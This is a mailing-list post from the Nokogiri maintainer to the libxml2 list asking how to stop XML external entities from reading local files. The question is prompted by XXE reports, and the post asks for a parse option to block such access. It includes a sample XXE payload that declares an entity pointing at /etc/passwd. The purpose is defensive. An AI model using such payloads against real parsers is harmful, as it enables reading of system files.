[xml] Question about security implications around external entities



Hi,

I'm a maintainer of Nokogiri, which is a libxml2 binding for Ruby. We've had questions on our mailing list around possible XXE attacks related to local files (see https://github.com/sparklemotion/nokogiri/issues/693 and related https://groups.google.com/group/nokogiri-talk/browse_thread/thread/47eaa6931bfa2301).

If I parse a document that references a local file, like this:

    <!DOCTYPE root [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
  <root>
    <e>&ent;</e>
  </root>

There is no obvious way to avoid having libxml2 open `/etc/passwd`. You may be able to avoid replacing the entity by setting the NOENT option; however there is still a possible vulnerability here. I can avoid loading external entity files that are accessed over the network by setting the NONET parse option; there is no equivalent for local file access.

My question is this: what's the offical libxml2 policy on this? Should users of libxml2 who are parsing untrusted documents do their parsing in a `chroot` environment to limit file access? Is there some other workaround? Are the maintainers open to a parse option that will turn off local file access? Is there something obvious that I'm missing?

Thanks very much for your attention.

-mike

---
mike dalessio / @flavorjones




[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]